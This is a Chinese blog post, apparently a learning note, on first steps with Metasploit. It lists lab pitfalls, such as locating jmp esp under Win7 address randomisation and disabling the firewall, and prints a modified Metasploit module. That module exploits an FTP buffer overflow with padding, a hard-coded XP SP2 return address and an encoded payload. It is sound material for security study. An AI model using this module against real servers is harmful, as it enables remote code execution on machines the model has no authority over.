0day 安全之 msf 初探

msf 这个工具 在我还没有开始学pwn 就有搞web的人 说过这个框架

只是没有怎么了解

没有想到这个工具 竟然使用Ruby 写的,, 社会 社会,。

然后这里 关于在 windows下的安装 我就不说了 反正 都一样(直接用kail的就行)

不过  有一点 感觉很坑  就是 版本不一样 然后  导致我们写的 exploit 可能会加载失败,,(可能是)

这里我也不太确定,因为我也不太熟悉rust开发 更不熟悉msf的框架

但是 我历经了大半天 还是把这个环境给搞定了, 效果截图

可以看到 我用的是 windows 7 x86

其实我已经装上了 XP 还有windows 2000  为啥要用 win7

这里就是我要说的第一个坑点了

 一定要用程序来找一下 jmp esp      这里win7 因为开了 加载基址随机化 所以每次开机都要重新 查找一次

但是 xp 和 2000 不用  

第二个坑点就是   一定要把 攻击机的防火墙给关了  

第三个坑点就是 编译的程序尽量用 release 版本的 不要用 debug版本的

然后 这里贴上 我改过的模块

require 'msf/core'
class MetasploitModule < Msf::Exploit::Remote
  include Msf::Exploit::Remote::Ftp
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'security test',
      'Description'    => %q{
          This module exploits a buffer overflow.
      },
      'Author'         => 'fwd',
      'License'        => MSF_LICENSE,
      'Privileged'     => true,
      'Payload'        =>
        {
          'Space'    => 300,
          'BadChars' => "\x00",
        },
      'Platform' 		  => 'win',
      'Targets'        =>
        [
          [ 'Windows XP Pro SP2 English',           { 'Ret' => 0x770445ee } ],
        ]))
  end
 
  def exploit
    connect
    attack_buf =  'a'*200
    attack_buf += [target.ret].pack('V')
    attack_buf += payload.encoded
    sock.put(attack_buf)
    handler
    disconnect
  end
end

然后就是我的攻击机的 环境

windows 10  然后 msf版本 是

 然后这里可以看出 我已经利用成功了

那么我这里就看一下利用方法,。

其实利用方法没有什么好说的 其实和上一篇的那个本地的 只不过这里 是用的socket网络链接

然后可以让我们 感受到实战的感觉

payload 用的是 msf自己生成的   然后我们只需要  找到方法自己生成 paload 就可以了

下面 开始windows2000的 堆^=^

发布了313 篇原创文章 · 获赞 44 · 访问量 6万+

猜你喜欢

转载自blog.csdn.net/qq_41071646/article/details/99576915